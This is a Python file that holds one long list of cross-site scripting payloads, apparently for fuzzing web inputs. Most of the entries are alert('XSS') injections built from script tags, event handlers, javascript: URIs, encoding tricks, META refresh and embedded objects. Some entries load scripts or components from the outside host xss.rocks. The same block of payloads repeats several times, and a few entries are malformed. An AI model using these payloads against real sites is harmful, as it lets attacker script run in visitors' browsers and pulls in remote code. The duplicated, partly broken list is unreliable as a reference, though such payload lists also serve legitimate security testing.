xss_payloads = [
    # Paste all your XSS payloads here
    "<script>alert('XSS')</script>",
    "<img src=x onerror=alert('XSS')>",
    "<svg/onload=alert('XSS')>",
    "<a href=javascript:alert('XSS')>Click me</a>",
    "<IMG SRC=j&#X41vascript:alert('XSS')>",
    "<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>",
    "<IMG SRC=JaVaScRiPt:alert('XSS')>",
    "<IMG SRC=javascript:alert('XSS')>",
    "<IMG SRC=`javascript:alert(\"RSnake says, 'XSS'\")`>",
    "<IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\">",
    "<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>",
    "<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>",
    "<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>",
    "<IMG SRC=\"jav\tascript:alert('XSS');\">",
    "<IMG SRC=\"jav&#x09;ascript:alert('XSS');\">",
    "<IMG SRC=\"jav&#x0A;ascript:alert('XSS');\">",
    "<IMG SRC=\"jav&#x0D;ascript:alert('XSS');\">",
    "<IMG SRC=java&#x0A;script:alert(\"XSS\")>",
    "<IMG SRC=\" &#14;  javascript:alert('XSS');\">",
    "<BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert(\"XSS\")>",
    "<SCRIPT>document.write(\"<SCRI\");</SCRIPT>PT>alert(\"XSS\")",
    "<<SCRIPT>alert(\"XSS\");//<</SCRIPT>",
    "<SCRIPT SRC=http://xss.rocks/xss.js></SCRIPT>",
    "<IMG SRC='vbscript:msgbox(\"XSS\")'>",
    "<IMG SRC='mocha:[code]'>",
    "<IMG SRC=\"L\">",
    "<IMG SRC=\"jav&#x09;ascript:alert('XSS');\">",
    "<IMG SRC=\"jav&#x0A;ascript:alert('XSS');\">",
    "<IMG SRC=\"jav&#x0D;ascript:alert('XSS');\">",
    "<IMG SRC=\" &#14;  javascript:alert('XSS');\">",
    "<SCRIPT SRC=http://xss.rocks/xss.js></SCRIPT>",
    "<IMG SRC='vbscript:msgbox(\"XSS\")'>",
    "<IMG SRC='mocha:[code]'>",
    "<IMG SRC=\"L\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\">",
    "<BODY BACKGROUND=\"javascript:alert('XSS')\">",
    "<BODY ONLOAD=alert('XSS')>",
    "<IMG DYNSRC=\"javascript:alert('XSS')\">",
    "<IMG LOWSRC=\"javascript:alert('XSS')\">",
    "<STYLE>@import'http://xss.rocks/xss.css';</STYLE>",
    "<META HTTP-EQUIV=\"Link\" Content=\"<http://xss.rocks/xss.css>; REL=stylesheet\">",
    "<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">",
    "<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\">",
    "<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\">",
    "<IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>",
    "<IFRAME SRC=# onmouseover=\"alert('XSS')\"></IFRAME>",
    "<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>",
    "<TABLE BACKGROUND=\"javascript:alert('XSS')\">",
    "<TABLE><TD BACKGROUND=\"javascript:alert('XSS')\">",
    "<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">",
    "<DIV STYLE=\"width: expression(alert('XSS'));\">",
    "<STYLE>@im\\port'\\ja\\vasc\\ript:alert(\"XSS\")';</STYLE>",
    "<BASE HREF=\"javascript:alert('XSS');//\">",
    "<OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http://xss.rocks/scriptlet.html\"></OBJECT>",
    "<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><PARAM NAME=SRC VALUE=\"http://xss.rocks/xss.hta\"></OBJECT>",
    "<EMBED SRC=\"http://xss.rocks/xss.swf\" AllowScriptAccess=\"always\"></EMBED>",
    "<XML ID=I><X><C><![CDATA[<IMG SRC=\"javas]]><![CDATA[cript:alert('XSS');\">",
    "<XML SRC=\"http://xss.rocks/xss.xml\" ID=I></XML>",
    "<HTML xmlns:xss><?import namespace=\"xss\" implementation=\"http://xss.rocks/xss.htc\"><xss:xss>XSS</xss:xss></HTML>",
    "<HTML xmlns:xss><?import namespace=\"xss\" implementation=\"http://xss.rocks/xss.htc\"><xss:xss>XSS</xss:xss></HTML>",
    "<?xml-stylesheet type=\"text/css\"?><!DOCTYPE x SYSTEM \"http://xss.rocks/xss.dtd\"><x>&x;</x>",
    "<?xml-stylesheet type=\"text/xsl\" href=\"http://xss.rocks/xss.xsl\"?><xss>xss</xss>",
    "<style>@import'http://xss.rocks/xss.css';</style><div id=\"xss\"></div>",
    "<!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]-->",
    "<!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]-->",
    "<BASE HREF=\"javascript:xss://\"><img src=\".\">",
    "<SCRIPT SRC=http://xss.rocks/xss.js></SCRIPT>",
    "<IMG SRC=\"javascript:alert('XSS')\"",
    "<IMG SRC=javascript:alert('XSS')>",
    "<IMG SRC=JaVaScRiPt:alert('XSS')>",
    "<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>",
    "<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>",
    "<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>",
    "<IMG SRC=\"javascript:alert('XSS')\"",
    "<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>",
    "<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>",
    "<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>",
    "<IMG SRC=\"javascript:alert('XSS');\">",
    "<IMG SRC=\"jav&#x09;ascript:alert('XSS');\">",
    "<IMG SRC=\"jav&#x0A;ascript:alert('XSS');\">",
    "<IMG SRC=\"jav&#x0D;ascript:alert('XSS');\">",
    "<IMG SRC=java&#x0A;script:alert(\"XSS\")>",
    "<IMG SRC=\" &#14;  javascript:alert('XSS');\">",
    "<BODY ONLOAD=alert('XSS')>",
    "<IMG DYNSRC=\"javascript:alert('XSS')\">",
    "<IMG LOWSRC=\"javascript:alert('XSS')\">",
    "<STYLE>@import'http://xss.rocks/xss.css';</STYLE>",
    "<META HTTP-EQUIV=\"Link\" Content=\"<http://xss.rocks/xss.css>; REL=stylesheet\">",
    "<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">",
    "<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\">",
    "<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\">",
    "<IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>",
    "<IFRAME SRC=# onmouseover=\"alert('XSS')\"></IFRAME>",
    "<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>",
    "<TABLE BACKGROUND=\"javascript:alert('XSS')\">",
    "<TABLE><TD BACKGROUND=\"javascript:alert('XSS')\">",
    "<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">",
    "<DIV STYLE=\"width: expression(alert('XSS'));\">",
    "<STYLE>@im\\port'\\ja\\vasc\\ript:alert(\"XSS\")';</STYLE>",
    "<BASE HREF=\"javascript:alert('XSS');//\">",
    "<OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http://xss.rocks/scriptlet.html\"></OBJECT>",
    "<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><PARAM NAME=SRC VALUE=\"http://xss.rocks/xss.hta\"></OBJECT>",
    "<EMBED SRC=\"http://xss.rocks/xss.swf\" AllowScriptAccess=\"always\"></EMBED>",
    "<XML ID=I><X><C><![CDATA[<IMG SRC=\"javas]]><![CDATA[cript:alert('XSS');\">",
    "<XML SRC=\"http://xss.rocks/xss.xml\" ID=I></XML>",
    "<HTML xmlns:xss><?import namespace=\"xss\" implementation=\"http://xss.rocks/xss.htc\"><xss:xss>XSS</xss:xss></HTML>",
    "<HTML xmlns:xss><?import namespace=\"xss\" implementation=\"http://xss.rocks/xss.htc\"><xss:xss>XSS</xss:xss></HTML>",
    "<?xml-stylesheet type=\"text/css\"?><!DOCTYPE x SYSTEM \"http://xss.rocks/xss.dtd\"><x>&x;</x>",
    "<?xml-stylesheet type=\"text/xsl\" href=\"http://xss.rocks/xss.xsl\"?><xss>xss</xss>",
    "<style>@import'http://xss.rocks/xss.css';</style><div id=\"xss\"></div>",
    "<!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]-->",
    "<!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]-->",
    "<BASE HREF=\"javascript:xss://\"><img src=\".\">",
    "<SCRIPT SRC=http://xss.rocks/xss.js></SCRIPT>",
    "<IMG SRC=\"javascript:alert('XSS')\"",
    "<IMG SRC=javascript:alert('XSS')>",
    "<IMG SRC=JaVaScRiPt:alert('XSS')>",
    "<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>",
    "<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>",
    "<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>",
    "<IMG SRC=\"javascript:alert('XSS')\"",
    "<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>",
    "<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>",
    "<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>",
    "<IMG SRC=\"javascript:alert('XSS');\">",
    "<IMG SRC=\"jav&#x09;ascript:alert('XSS');\">",
    "<IMG SRC=\"jav&#x0A;ascript:alert('XSS');\">",
    "<IMG SRC=\"jav&#x0D;ascript:alert('XSS');\">",
    "<IMG SRC=java&#x0A;script:alert(\"XSS\")>",
    "<IMG SRC=\" &#14;  javascript:alert('XSS');\">",
    "<BODY ONLOAD=alert('XSS')>",
    "<IMG DYNSRC=\"javascript:alert('XSS')\">",
    "<IMG LOWSRC=\"javascript:alert('XSS')\">",
    "<STYLE>@import'http://xss.rocks/xss.css';</STYLE>",
    "<META HTTP-EQUIV=\"Link\" Content=\"<http://xss.rocks/xss.css>; REL=stylesheet\">",
    "<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">",
    "<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\">",
    "<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\">",
    "<IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>",
    "<IFRAME SRC=# onmouseover=\"alert('XSS')\"></IFRAME>",
    "<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>",
    "<TABLE BACKGROUND=\"javascript:alert('XSS')\">",
    "<TABLE><TD BACKGROUND=\"javascript:alert('XSS')\">",
    "<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">",
    "<DIV STYLE=\"width: expression(alert('XSS'));\">",
    "<STYLE>@im\\port'\\ja\\vasc\\ript:alert(\"XSS\")';</STYLE>",
    "<BASE HREF=\"javascript:alert('XSS');//\">",
    "<OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http://xss.rocks/scriptlet.html\"></OBJECT>",
    "<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><PARAM NAME=SRC VALUE=\"http://xss.rocks/xss.hta\"></OBJECT>",
    "<EMBED SRC=\"http://xss.rocks/xss.swf\" AllowScriptAccess=\"always\"></EMBED>",
    "<XML ID=I><X><C><![CDATA[<IMG SRC=\"javas]]><![CDATA[cript:alert('XSS');\">",
    "<XML SRC=\"http://xss.rocks/xss.xml\" ID=I></XML>",
    "<HTML xmlns:xss><?import namespace=\"xss\" implementation=\"http://xss.rocks/xss.htc\"><xss:xss>XSS</xss:xss></HTML>",
    "<HTML xmlns:xss><?import namespace=\"xss\" implementation=\"http://xss.rocks/xss.htc\"><xss:xss>XSS</xss:xss></HTML>",
    "<?xml-stylesheet type=\"text/css\"?><!DOCTYPE x SYSTEM \"http://xss.rocks/xss.dtd\"><x>&x;</x>",
    "<?xml-stylesheet type=\"text/xsl\" href=\"http://xss.rocks/xss.xsl\"?><xss>xss</xss>",
    "<style>@import'http://xss.rocks/xss.css';</style><div id=\"xss\"></div>",
    "<!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]-->",
    "<!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]-->",
    "<BASE HREF=\"javascript:xss://\"><img src=\".\">",
    "<SCRIPT SRC=http://xss.rocks/xss.js></SCRIPT>",
    "<IMG SRC=\"javascript:alert('XSS')\"",
    "<IMG SRC=javascript:alert('XSS')>",
    "<IMG SRC=JaVaScRiPt:alert('XSS')>",
    "<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>",
    "<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>",
    "<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>",
    "<IMG SRC=\"javascript:alert('XSS')\"",
    "<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>",
    "<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>",
    "<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>",
    "<IMG SRC=\"javascript:alert('XSS');\">",
    "<IMG SRC=\"jav&#x09;ascript:alert('XSS');\">",
    "<IMG SRC=\"jav&#x0A;ascript:alert('XSS');\">",
    "<IMG SRC=\"jav&#x0D;ascript:alert('XSS');\">",
    "<IMG SRC=java&#x0A;script:alert(\"XSS\")>",
    "<IMG SRC=\" &#14;  javascript:alert('XSS');\">",
    "<BODY ONLOAD=alert('XSS')>",
    "<IMG DYNSRC=\"javascript:alert('XSS')\">",
    "<IMG LOWSRC=\"javascript:alert('XSS')\">",
    "<STYLE>@import'http://xss.rocks/xss.css';</STYLE>",
    "<META HTTP-EQUIV=\"Link\" Content=\"<http://xss.rocks/xss.css>; REL=stylesheet\">",
    "<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">",
    "<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\">",
    "<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\">",
    "<IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>",
    "<IFRAME SRC=# onmouseover=\"alert('XSS')\"></IFRAME>",
    "<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>",
    "<TABLE BACKGROUND=\"javascript:alert('XSS')\">",
    "<TABLE><TD BACKGROUND=\"javascript:alert('XSS')\">",
    "<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">",
    "<DIV STYLE=\"width: expression(alert('XSS'));\">",
    "<STYLE>@im\\port'\\ja\\vasc\\ript:alert(\"XSS\")';</STYLE>",
    "<BASE HREF=\"javascript:alert('XSS');//\">",
    "<OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http://xss.rocks/scriptlet.html\"></OBJECT>",
    "<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><PARAM NAME=SRC VALUE=\"http://xss.rocks/xss.hta\"></OBJECT>",
    "<EMBED SRC=\"http://xss.rocks/xss.swf\" AllowScriptAccess=\"always\"></EMBED>",
    "<XML ID=I><X><C><![CDATA[<IMG SRC=\"javas]]><![CDATA[cript:alert('XSS');\">",
    "<XML SRC=\"http://xss.rocks/xss.xml\" ID=I></XML>",
    "<HTML xmlns:xss><?import namespace=\"xss\" implementation=\"http://xss.rocks/xss.htc\"><xss:xss>XSS</xss:xss></HTML>",
    "<HTML xmlns:xss><?import namespace=\"xss\" implementation=\"http://xss.rocks/xss.htc\"><xss:xss>XSS</xss:xss></HTML>",
    "<?xml-stylesheet type=\"text/css\"?><!DOCTYPE x SYSTEM \"http://xss.rocks/xss.dtd\"><x>&x;</x>",
    "<?xml-stylesheet type=\"text/xsl\" href=\"http://xss.rocks/xss.xsl\"?><xss>xss</xss>",
    "<style>@import'http://xss.rocks/xss.css';</style><div id=\"xss\"></div>",
    "<!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]-->",
    "<!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]-->",
    "<BASE HREF=\"javascript:xss://\"><img src=\".\">",
    "<SCRIPT SRC=http://xss.rocks/xss.js></SCRIPT>",
    "<IMG SRC=\"javascript:alert('XSS')\"",
    "<IMG SRC=javascript:alert('XSS')>",
    "<IMG SRC=JaVaScRiPt:alert('XSS')>",
    "<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>",
    "<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>",
    "<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>",
    "<IMG SRC=\"javascript:alert('XSS')\"",
    "<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>",
    "<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>",
    "<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>",
    "<IMG SRC=\"javascript:alert('XSS');\">",
    "<IMG SRC=\"jav&#x09;ascript:alert('XSS');\">",
    "<IMG SRC=\"jav&#x0A;ascript:alert('XSS');\">",
    "<IMG SRC=\"jav&#x0D;ascript:alert('XSS');\">",
    "<IMG SRC=java&#x0A;script:alert(\"XSS\")>",
    "<IMG SRC=\" &#14;  javascript:alert('XSS');\">",
    "<BODY ONLOAD=alert('XSS')>",
    "<IMG DYNSRC=\"javascript:alert('XSS')\">",
    "<IMG LOWSRC=\"javascript:alert('XSS')\">",
    "<STYLE>@import'http://xss.rocks/xss.css';</STYLE>",
    "<META HTTP-EQUIV=\"Link\" Content=\"<http://xss.rocks/xss.css>; REL=stylesheet\">",
    "<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">",
    "<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\">",
    "<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\">",
    "<IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>",
    "<IFRAME SRC=# onmouseover=\"alert('XSS')\"></IFRAME>",
    "<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>",
    "<TABLE BACKGROUND=\"javascript:alert('XSS')\">",
    "<TABLE><TD BACKGROUND=\"javascript:alert('XSS')\">",
    "<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">",
    "<DIV STYLE=\"width: expression(alert('XSS'));\">",
    "<STYLE>@im\\port'\\ja\\vasc\\ript:alert(\"XSS\")';</STYLE>",
    "<BASE HREF=\"javascript:alert('XSS');//\">",
    "<OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http://xss.rocks/scriptlet.html\"></OBJECT>",
    "<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><PARAM NAME=SRC VALUE=\"http://xss.rocks/xss.hta\"></OBJECT>",
    "<EMBED SRC=\"http://xss.rocks/xss.swf\" AllowScriptAccess=\"always\"></EMBED>",
    "<XML ID=I><X><C><![CDATA[<IMG SRC=\"javas]]><![CDATA[cript:alert('XSS');\">",
    "<XML SRC=\"http://xss.rocks/xss.xml\" ID=I></XML>",
    "<HTML xmlns:xss><?import namespace=\"xss\" implementation=\"http://xss.rocks/xss.htc\"><xss:xss>XSS</xss:xss></HTML>",
    "<HTML xmlns:xss><?import namespace=\"xss\" implementation=\"http://xss.rocks/xss.htc\"><xss:xss>XSS</xss:xss></HTML>",
    "<?xml-stylesheet type=\"text/css\"?><!DOCTYPE x SYSTEM \"http://xss.rocks/xss.dtd\"><x>&x;</x>",
    "<?xml-stylesheet type=\"text/xsl\" href=\"http://xss.rocks/xss.xsl\"?><xss>xss</xss>",
    "<style>@import'http://xss.rocks/xss.css';</style><div id=\"xss\"></div>",
    "<!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]-->",
    "<!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]-->",
    "<BASE HREF=\"javascript:xss://\"><img src=\".\">",
]


